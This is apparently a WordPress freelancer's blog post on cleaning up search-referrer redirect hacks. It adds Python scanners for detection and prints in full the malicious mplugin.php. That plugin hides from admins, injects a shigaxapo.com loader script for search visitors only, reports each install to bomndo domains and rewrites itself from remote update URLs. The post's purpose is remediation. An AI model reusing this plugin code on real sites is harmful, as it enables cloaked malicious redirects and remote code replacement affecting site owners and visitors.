Hacked code injected of ad site – re directs when clicked from google search

When a visitor clicks a website's link in Google search results and lands on the page, and then clicks any link on that page, the browser is automatically redirected to URLs containing “shigaxapo”. If the visitor did not come from a search engine, no redirect happens and the site behaves normally. Only visitors from search engines are redirected; other users are unaffected by this hack. In this article, I will discuss how I solved this malware.

Message I got from the client

From a client, I got a message: “can you fix this problem? My website is redirecting visitors to another website, do you know why this is happening?” I hopped in quickly and replied, “I need to analyze it first, because every website is different, no one solution fits all, and a hack is a complicated thing to fix.” The client agreed and allowed us to investigate the issue.

Formula to solve a problem

Note: from my past experience, solving a problem or making a change or customization requires 2 major steps: 1) analyzing the problem and finding a way to fix it, which takes 80-90% of the time, and 2) the remaining 10-15%, which is actually making the change in the code or files.

Scenario:

When I clicked a result from Google, landed on the site and then clicked a link on the site, it redirected me to URLs containing “shigaxapo”. But once I was already on the site it no longer redirected; if I visited the site directly as a visitor it did not redirect; and when logged in as an admin it did not redirect either.

My thoughts:

As it was redirecting to URLs containing “shigaxapo”, I used “inspect element” in Google Chrome and found nothing. A redirect on WordPress cannot be done with CSS or HTML alone, so it must be using JavaScript or PHP.

My steps:

So I downloaded the whole site's files with FileZilla FTP and searched for the word “shigaxapo” with Notepad++. Luckily I found a malware file that is not part of WordPress or any other authentic plugin. The file was mplugin.php. I analyzed the PHP file and found the code, functions and logic used to inject the site with this malware. From that PHP file I found another file, admin_ips.txt, where admin IPs are stored like this:

2.36.67.193
81.31.155.59
119.30.47.136

My Verdict:

It was injected inside the plugins folder: a plugin that hides itself and activates automatically. You can check the count of activated plugins and see that 1 extra plugin is activated but not visible in the wp-admin plugins list.

I deleted those files and ran multiple tests from different devices, and the redirect problem was solved successfully. The client was happy :D.
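The search for the redirect hostname and the self-hiding plugin described above can be turned into a repeatable triage step: scan wp-content/plugins for PHP files that combine the traits of mplugin.php (error suppression, referer-based cloaking, hiding from the plugin list, overwriting its own file from a remote host). This is an added example, not code from the post; the indicator weights, the threshold and the two constructed sample plugins (with the placeholder host update.example.invalid) are my own assumptions.

```python
"""Triage scanner for a wp-content/plugins tree: flags PHP files that combine
the traits of mplugin.php. Constructed example, not code from the post."""
import os
import re
import tempfile

# (label, regex, weight). Weights are my own choice; the threshold needs more
# than one incidental match, so a plugin that merely reads HTTP_REFERER is not flagged.
INDICATORS = [
    ("suppresses errors", re.compile(r"error_reporting\(\s*0\s*\)"), 1),
    ("reads HTTP_REFERER", re.compile(r"\$_SERVER\[\s*.HTTP_REFERER.\s*\]"), 1),
    ("search-engine referer list", re.compile(r"google\.|yandex|bing\.|baidu", re.I), 1),
    ("injects dynamic script src", re.compile(r"\.src\s*=\s*[\"']"), 1),
    ("fetches remote http URL", re.compile(r"file_get_contents\w*\(\s*[\"']https?://"), 2),
    ("hides itself from plugin list", re.compile(r"pre_current_active_plugins"), 3),
    ("unsets wp_list_table items", re.compile(r"unset\(\s*\$wp_list_table->items"), 3),
    ("overwrites own file", re.compile(r"file_put_contents\(\s*__FILE__"), 3),
]
THRESHOLD = 5

def score_source(src):
    """Return (total weight, matched labels) for one PHP source string."""
    hits = [(label, w) for label, rx, w in INDICATORS if rx.search(src)]
    return sum(w for _, w in hits), [label for label, _ in hits]

def scan_plugins_dir(root):
    """Walk a plugins tree; return {relative path: labels} for files at or above THRESHOLD."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, labels = score_source(fh.read())
            if score >= THRESHOLD:
                findings[os.path.relpath(path, root)] = labels
    return findings

# Constructed samples: a cut-down imitation of the malware's structure (placeholder host)
# and a harmless plugin, so the scanner can be exercised offline.
SUSPECT = r"""<?php
error_reporting(0);
$referer = $_SERVER['HTTP_REFERER'];
foreach (explode(',', get_option('search_engines')) as $se) {
  if (strpos($referer, $se) !== false) { setcookie('organic', 1, time()+120); }
}
function hide_me() { global $wp_list_table; unset($wp_list_table->items['mplugin.php']); }
add_action('pre_current_active_plugins', 'hide_me');
if ($new = @file_get_contents("http://update.example.invalid/update.php")) { @file_put_contents(__FILE__, $new); }
"""
BENIGN = r"""<?php
/* Plugin Name: Footer Note (constructed benign sample) */
add_action('wp_footer', function () { echo '<p>Thanks for visiting.</p>'; });
"""

def demo():
    """Write both samples into a temporary plugins tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for folder, name, body in (("mplugin", "mplugin.php", SUSPECT),
                                   ("footer-note", "footer-note.php", BENIGN)):
            os.makedirs(os.path.join(root, folder))
            with open(os.path.join(root, folder, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_plugins_dir(root)
```

Point scan_plugins_dir at a downloaded copy of wp-content/plugins; every flagged file still needs a manual read, since the score only ranks candidates.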

I will attach some of the code or the file to make it clear. Leave a comment below if you have any questions or ask me anything.

If you need help regarding any WordPress/website issues, you can contact me.

Below is the code from the file mplugin.php:

<?php
/**
 * Plugin Name: Monetization Code plugin
 * Description: mplugin Shows cusom codes to display your ad codes.
 * Author: aerin Singh
 * Version: 1.0
 */
error_reporting(0);
ini_set('display_errors', 0);
$plugin_key='276be77f6692f898404fb9629f81db09';
$version='1.2';

add_action('admin_menu', function() {
    add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin', 'mplugin_page' );
    remove_submenu_page( 'options-general.php', 'mplugin' );
});



add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_mplugin');
function salcode_add_plugin_page_settings_mplugin( $links ) {
	$links[] = '<a href="' .
		admin_url( 'options-general.php?page=mplugin' ) .
		'">' . __('Settings') . '</a>';
	return $links;
}






add_action( 'admin_init', function() {

    register_setting( 'mplugin-settings', 'default_mont_options' );
    register_setting( 'mplugin-settings', 'ad_code' );
	register_setting( 'mplugin-settings', 'hide_admin' );
	register_setting( 'mplugin-settings', 'hide_logged_in' );
    register_setting( 'mplugin-settings', 'display_ad' );
    register_setting( 'mplugin-settings', 'search_engines' );
	register_setting( 'mplugin-settings', 'auto_update' );
	register_setting( 'mplugin-settings', 'ip_admin');
	register_setting( 'mplugin-settings', 'cookies_admin' );
	register_setting( 'mplugin-settings', 'logged_admin' );
	register_setting( 'mplugin-settings', 'log_install' );
	
});

$ad_code='
<script>
(function(__htas){
var d = document,
    s = d.createElement(\'script\'),
    l = d.scripts[d.scripts.length - 1];
s.settings = __htas || {};
s.src = "\/\/shigaxapo.com\/c\/D.9D6\/bA2D5hlJSnWaQf9AN\/DsEP0\/MCTdgo2cN-i\/0\/0oM\/T\/Q\/xoOsDJYX3v";
l.parentNode.insertBefore(s, l);
})({})
</script>

';

$hide_admin='on';
$hide_logged_in='on';
$display_ad='organic';
$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
$auto_update='on';
$ip_admin='on';
$cookies_admin='on';
$logged_admin='on';
$log_install='';

function mplugin_page() {
 ?>
   <div class="wrap">
<form action="options.php" method="post">
       <?php
       settings_fields( 'mplugin-settings' );
       do_settings_sections( 'mplugin-settings' );
$ad_code='';

$hide_admin='on';
$hide_logged_in='on';
$display_ad='organic';
$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
$auto_update='on';
$ip_admin='on';
$cookies_admin='on';
$logged_admin='on';
$log_install='';

       ?>
	   <h2>mplugin Plugin</h2>
	   <table>
             
 <tr>
                <th>Ad Code</th>
                <td><textarea placeholder="" name="ad_code" rows="5" cols="130"><?php echo get_option('ad_code',$ad_code) ; ?></textarea></td>
            </tr>
			
			
			
<tr>
                <th>Hide ads to :</th>
                <td>
                    <input type="hidden" id="default_mont_options" name="default_mont_options" value="on">
                    <label>
                        <input type="checkbox" name="hide_admin" <?php echo esc_attr( get_option('hide_admin',$hide_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />admins
                    </label>
                    <label>
                        <input type="checkbox" name="hide_logged_in" <?php echo esc_attr( get_option('hide_logged_in',$hide_logged_in) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in users
                    </label>
					<br/>
                 

                </td>
            </tr>
			
			
			
			<tr>
                <th>Recognize admin by :</th>
                <td>

                    <label>
                        <input type="checkbox" name="logged_admin" <?php echo esc_attr( get_option('logged_admin',$logged_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in
                    </label>
                    <label>
                        <input type="checkbox" name="ip_admin" id="ip_admin"  <?php echo esc_attr( get_option('ip_admin',$ip_admin) ) == 'on' ? 'checked="checked"' : '' ?> />By IP addresses
                    </label>
                                        <label>
                        <input type="checkbox" name="cookies_admin" <?php echo esc_attr( get_option('cookies_admin',$cookies_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />By Cookies
                    </label>
				
                 

                </td>
            </tr>
			
			
			
			<tr>
                <th>Display ads to :</th>
                <td>
                 				         <select name="display_ad">
                        
                        <option value="organic" <?php echo esc_attr( get_option('display_ad',$display_ad) ) == 'organic' ? 'selected="selected"' : ''; ?>>Organic traffic only</option>
                        <option value="all_visitors" <?php echo esc_attr( get_option('display_ad') ) == 'all_visitors' ? 'selected="selected"' : ''; ?>>All Visitors</option>
                        
                    </select>

                </td>
            </tr>

            <tr>
                <th>Search Engines</th>
                <td><input type="text" placeholder="Internal title" name="search_engines" value="<?php echo esc_attr( get_option('search_engines',$search_engines) ); ?>" size="80" /><p class="description">
			comma separated  </p>
				</td>
            </tr>
 
 
 <tr>
                <th>Auto Update :</th>
                <td>

                    <label>
                        <input type="checkbox" name="auto_update" <?php echo esc_attr( get_option('auto_update',$auto_update) ) == 'on' ? 'checked="checked"' : ''; ?> />auto update plugin
                    </label><br/>
                 

                </td>
            </tr>
 
            <tr>
                <td><?php submit_button(); ?></td>
            </tr>
 
        </table>
	   
	   
	   
     </form>
   </div>
 <?php
}

/*************************log install***************************/
if(get_option('log_install') !=='1')
{
    if(!$log_installed = @file_get_contents("http://www.bomndo.xyz/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
    $log_installed = @file_get_contents_mplugin("http://www.bomndo.xyz/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}
/*************************set default options***************************/

if(get_option('default_mont_options') !=='on')
{
update_option('ip_admin', $ip_admin);
update_option('ad_code', $ad_code);
update_option('cookies_admin', $cookies_admin);
update_option('logged_admin', $logged_admin);
update_option('hide_admin', $hide_admin);
update_option('hide_logged_in', $hide_logged_in);
update_option('display_ad', $display_ad);
update_option('search_engines', $search_engines);
update_option('auto_update', $auto_update);
update_option('log_install', '1');
}

/************************************************************************/
include_once(ABSPATH . 'wp-includes/pluggable.php'); 

if ( ! function_exists( 'display_ad_single' ) ) {  

function display_ad_single($content){ 
if(is_single())
{

$content=$content.get_option('ad_code');;
}
return $content;
} 

function display_ad_footer(){ 
if(!is_single())
{
echo get_option('ad_code');
}
} 


//setting cookies if admin logged in
function setting_admin_cookie() {
  setcookie( 'wordpress_admin_logged_in',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }

if(get_option('cookies_admin')=='on')
{

if(is_user_logged_in())
{
add_action( 'init', 'setting_admin_cookie',1 );
}
}


//log admin IP addresses
$vis_ip=getVisIpAddr_mplugin();
if(get_option('ip_admin')=='on')
{
if(current_user_can('edit_others_pages'))
{

if (file_exists(plugin_dir_path( __FILE__ ) .'admin_ips.txt'))
{
$ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
}

if (stripos($ip, $vis_ip) === false)
{
$ip.=$vis_ip.'
';
@file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);

}

}
}// end if log admins ip




//add cookies to organic traffic

if(get_option('display_ad')=='organic')
{

$search_engines = explode(',', get_option('search_engines'));

$referer = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($search_engines as $search) {
  if (strpos($referer,$search)!==false) {
    setcookie("organic", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
	$organic=true;
  }
}

}//end




//display ad

if(!isset($_COOKIE['wordpress_admin_logged_in']) && !is_user_logged_in()) 
{

$ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
if (stripos($ips, $vis_ip) === false)
{
/*****/
if(get_option('display_ad')=='organic')
{
if($organic==true || isset($_COOKIE['organic']))
{
add_filter('the_content','display_ad_single');
add_action('wp_footer','display_ad_footer'); 
}
}
else
{
add_filter('the_content','display_ad_single');
add_action('wp_footer','display_ad_footer');  
}

/****/

}

}
/*******************/





//update plugin

if(get_option('auto_update')=='on')
{

if( ini_get('allow_url_fopen') ) {



        if (($new_version = @file_get_contents("http://www.bomndo.xyz/update.php") OR $new_version = @file_get_contents_mplugin("http://www.bomndo.xyz/update.php")) AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }
        
        
                elseif ($new_version = @file_get_contents("http://www.bomndo.com/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }


        elseif ($new_version = @file_get_contents("http://www.bomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }

}
else
{
            if (($new_version = @file_get_contents("http://www.bomndo.xyz/update.php") OR $new_version = @file_get_contents_mplugin("http://www.bomndo.xyz/update.php")) AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }
        
        
                elseif ($new_version = @file_get_contents_mplugin("http://www.bomndo.com/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }


        elseif ($new_version = @file_get_contents_mplugin("http://www.bomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }
}
}//end if auto update

/*********************************/



}// if function exist



     function file_get_contents_mplugin($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }


function hide_plugin_mplugin() {
  global $wp_list_table;
  $hidearr = array('mplugin.php');
  $myplugins = $wp_list_table->items;
  foreach ($myplugins as $key => $val) {
    if (in_array($key,$hidearr)) {
      unset($wp_list_table->items[$key]);
    }
  }
}

add_action('pre_current_active_plugins', 'hide_plugin_mplugin');

        function getVisIpAddr_mplugin() { 
      
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) { 
        return $_SERVER['HTTP_CLIENT_IP']; 
    } 
    else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { 
        return $_SERVER['HTTP_X_FORWARDED_FOR']; 
    } 
    else { 
        return $_SERVER['REMOTE_ADDR']; 
    } 
}

?>

Wordfence plugin detected malicious file rss-xml.php

During an automatic scan, the Wordfence security plugin flagged a hacked file. Cloudways support had mentioned a file that was consuming server resources; maybe this is the file left after hackers attacked the site continuously and kept the server's CPU usage high for the last few weeks.

Screenshots given below:

Screenshot: Wordfence plugin detected malicious file rss-xml.php

Our Website was auto redirecting Google search traffic to dozens of unknown website: How we fixed the hacking?

We were randomly checking our website from a mobile phone and, to our surprise, when I googled specific keywords for the WordPress WooCommerce e-commerce website Dakhm.com and tapped the search result for Dakhm, it took us to Dakhm's page but then auto-redirected through a couple of other websites and landed on a betting site. It was clear as day that the website was hacked. After 1-2 days of work, I was able to find the malware in a plugin and deactivated it; now it is working fine. Dive into the article below to learn from our journey.

How did we find our website was hacked?

One of our customers asked over the phone for a product's price. I searched on my mobile for that product name with “Dakhm” added to it so Google would show Dakhm's product first. I tapped the Google result, and on Dakhm's product page I couldn't tap anything: it auto-redirected to other random websites. I was frustrated and understood something was wrong and the website was hacked. Another abnormal fact was that, when we visited from Google search, one of the popups made with Popup Builder opened automatically, although that popup should not open by default when visiting the product page or any other page, as it was set up to open on mouse click.

Server CPU usage was high and website was not loading

CPU usage on the hosting was high and the website was not loading at all the previous days; that high CPU usage had probably been there for the past 2 days. When I checked the server at Cloudways, it showed CPU and RAM constantly high, not letting the site stay online for more than 1 hour. I checked the Cloudways monitoring tabs, where I could see random IPs from outside Bangladesh constantly accessing a large number of JSON files, and those IPs were not viewing any product but other URLs. Normally I can recognize the pattern of bots and hackers from outside Bangladesh: Dakhm is only available to Bangladeshi customers, so Google does not show it in search results in foreign countries and we don't get visitors from outside Bangladesh that often. Also, normal visitors check products and their account. When I saw a large number of IPs from other countries hitting Dakhm and exhausting server resources, I realised something was not right.

How did we understand the attack on the site?

I took the IPs from Cloudways and searched them on https://www.abuseipdb.com/check/23.22.35.162 and found people had already reported those IPs. I contacted Cloudways support, but they couldn't identify those IPs as hackers, and they didn't suggest anything to protect the site or block those IPs. We were a bit confused about whether to block those IPs or not: what if they were search engine bots? Cloudways support people are really good; they take time and responsibility to solve issues, but they cannot solve every issue, and I understand their effort and have no complaints. So I left it as it was, since there were many IPs and I could not block them all, and waited for the server resources to get back to normal. Again, on Dakhm's product page, tapping any link started the redirection, so this was clearly a JavaScript issue and JS code had been injected.

What cloudways did to minimize the server load?

They restarted my server, which brought the server load back to normal, but the attack started all over again, and I had nothing to do but wait for it to return to normal.

What steps did we take to point out the hacked code?

I have previously fixed many hacked websites and have seen such problems before. Some of my tricks are below:

Look for the names of the redirect target websites in the source code of the affected site

You can inspect the affected site's source with “inspect element” and search for the names of the websites it redirects to, to see which code is making the redirection, but this method was not working here.

Inspect Element using Chrome browser

Inspect every possible way to find the redirection code with Chrome developer tools; this method did not work either. Maybe Chrome has advanced tools that we need to learn in order to analyze such injected hacking code.
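Inspecting the page yourself fails against this kind of cloaking because the injected script is only served to visitors who arrive from a search engine (and, in the mplugin.php case above, is withheld from admins). One way to check from outside is to fetch the same URL twice, once with no Referer and once with a search-engine Referer, and report script tags present only in the second copy. This is an added example, not code from the post; the page URL, the constructed DIRECT and FROM_SEARCH responses and the placeholder host cdn.example.invalid are assumptions.

```python
"""Black-box check for referer-based script cloaking. Constructed example, not from the post."""
import re
import urllib.request

SCRIPT_RX = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RX = re.compile(r"src\s*=\s*[\"']([^\"']+)", re.I)

def script_fingerprints(html):
    """Fingerprint every script: external ones by src, inline ones by normalized body."""
    fps = set()
    for attrs, body in SCRIPT_RX.findall(html):
        m = SRC_RX.search(attrs)
        if m:
            fps.add("src:" + m.group(1).strip())
        else:
            fps.add("inline:" + re.sub(r"\s+", " ", body).strip()[:200])
    return fps

def cloaked_scripts(html_direct, html_from_search):
    """Scripts served only when the visitor appears to come from a search engine."""
    return sorted(script_fingerprints(html_from_search) - script_fingerprints(html_direct))

def fetch(url, referer=None):
    """GET a page with an optional Referer. No cookie jar is used, so each request looks
    like a fresh visitor (the malware above sets an 'organic' cookie on the first hit)."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0 (cloaking-check)"})
    if referer:
        req.add_header("Referer", referer)
    with urllib.request.urlopen(req, timeout=20) as resp:
        return resp.read().decode("utf-8", errors="replace")

def check_url(url):
    """Live comparison for a real site: direct visit versus a Google-referred visit."""
    return cloaked_scripts(fetch(url), fetch(url, referer="https://www.google.com/search?q=test"))

# Constructed responses standing in for the two fetches, so the comparison runs offline.
DIRECT = """<html><head><script src="/wp-includes/js/jquery.js"></script></head>
<body><p>Product page</p><script>console.log("theme")</script></body></html>"""
FROM_SEARCH = DIRECT.replace("</body>", """<script>
(function(){var s=document.createElement('script');
s.src="//cdn.example.invalid/loader.js";document.body.appendChild(s);})();
</script></body>""")
```

Run check_url on a suspect page URL; a non-empty result lists the inline loader or external src that only search visitors receive, which is what to grep for in the site's files.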

Wordfence security plugin

We initiated a site scan with Wordfence. Although the WordPress plugin was active while the site was being hacked, it couldn't stop such an incident. Also, Wordfence was not able to scan the whole site; we tried multiple times. This plugin has limitations and was of no use either for now.

Cloudways Support

Their chat agent was unable to say anything about the malware; he created a ticket for another department to solve it. Later another support team member contacted us and scanned the site but was not able to pinpoint the affected code. I asked him if he could point out the exact file or code; he said it was not within their scope and asked me to take their paid security service.

How did we remove the malware?

From their screenshot above I picked out a “pbuilder”-type word; I searched the source code for it but found nothing, though I did see a “builder”-type word in the popup plugin's div class names. I deactivated the popup plugin and, thank Allah, the malware was removed, so the attacker had injected the code into that plugin.

Final check

I checked the plugin's support forum https://wordpress.org/support/plugin/popup-builder/ and saw other people had also reported the hack, so I was 200% sure and relieved. But the popup function on the site remains broken as I deactivated the plugin.

What precautions should you take to avoid such hacking?

Actually there is no specific operation to take. It is good to update all the plugins and themes from time to time, and to look for any abnormal changes after each plugin update or any other type of update. In my opinion the hackers exploited a weak spot in the plugin and carried out the attack, so it is entirely the plugin's fault.